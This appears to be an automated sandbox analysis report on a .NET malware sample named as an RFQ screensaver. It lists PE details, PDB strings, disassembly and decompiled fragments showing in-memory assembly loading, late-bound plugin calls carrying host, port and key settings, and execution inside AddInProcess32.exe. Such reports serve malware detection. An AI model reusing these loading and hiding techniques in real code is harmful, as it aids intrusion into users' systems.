Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: RFQPO3D93876738.scr.exe

Static file information: File size 1150463 > 1048576

Source: RFQPO3D93876738.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbbL source: RFQPO3D93876738.scr.exe, 00000000.00000002.1553197918.000002422B442000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb.an source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: mscorlib.pdbx source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: RFQPO3D93876738.scr.PDB source: RFQPO3D93876738.scr.exe, 00000000.00000002.1552539508.000000CCC34F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: System.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbexe source: RFQPO3D93876738.scr.exe, 00000000.00000002.1553197918.000002422B49A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb3 source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp, WERCA61.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbsl source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbPtr)' source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\RFQPO3D93876738.scr.PDB source: RFQPO3D93876738.scr.exe, 00000000.00000002.1553197918.000002422B49A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\RFQPO3D93876738.scr.PDB source: RFQPO3D93876738.scr.exe, 00000000.00000002.1552539508.000000CCC34F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\RFQPO3D93876738.scr.PDBl source: RFQPO3D93876738.scr.exe, 00000000.00000002.1552539508.000000CCC34F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: System.Drawing.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdblE source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.pdbP source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: .pdbHJ source: RFQPO3D93876738.scr.exe, 00000000.00000002.1552539508.000000CCC34F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb7 source: RFQPO3D93876738.scr.exe, 00000000.00000002.1557994516.0000024245790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: pC:\Users\user\Desktop\RFQPO3D93876738.scr.PDB source: RFQPO3D93876738.scr.exe, 00000000.00000002.1552539508.000000CCC34F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WERCA61.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERCA61.tmp.dmp.9.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0de260.2.raw.unpack, Messages.cs	.Net Code: Memory
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.RFQPO3D93876738.scr.exe.2422d0e70a0.3.raw.unpack, Messages.cs	.Net Code: Memory

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC4895BA push eax; iretd	0_2_00007FFAAC4895D9
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC48789E push eax; retf	0_2_00007FFAAC4878AD
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC48786E pushad ; retf	0_2_00007FFAAC48789D
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC487969 push ebx; retf	0_2_00007FFAAC48796A
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC488161 push ebx; ret	0_2_00007FFAAC48816A
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC487A20 push ebx; retf 5F4Eh	0_2_00007FFAAC487A6A
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC487C2E pushad ; retf	0_2_00007FFAAC487C5D
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC487C5E push eax; retf	0_2_00007FFAAC487C6D
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Code function: 0_2_00007FFAAC560000 push esp; retf 4810h	0_2_00007FFAAC560312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_05A9123F push 8B000003h; iretd	6_2_05A91244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_06360006 push es; ret	6_2_0636001C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_06366C58 pushfd ; retf	6_2_06366C59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_066B6D40 push es; ret	6_2_066B7A48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_066B6D40 push es; retf	6_2_066B7AAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_066B7930 push es; retf	6_2_066B7AAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07A37ECA pushfd ; retf	6_2_07A37ED1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07A37DA2 push esp; retf	6_2_07A37DA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_07DD652F push eax; ret	6_2_07DD6543

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQPO3D93876738.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
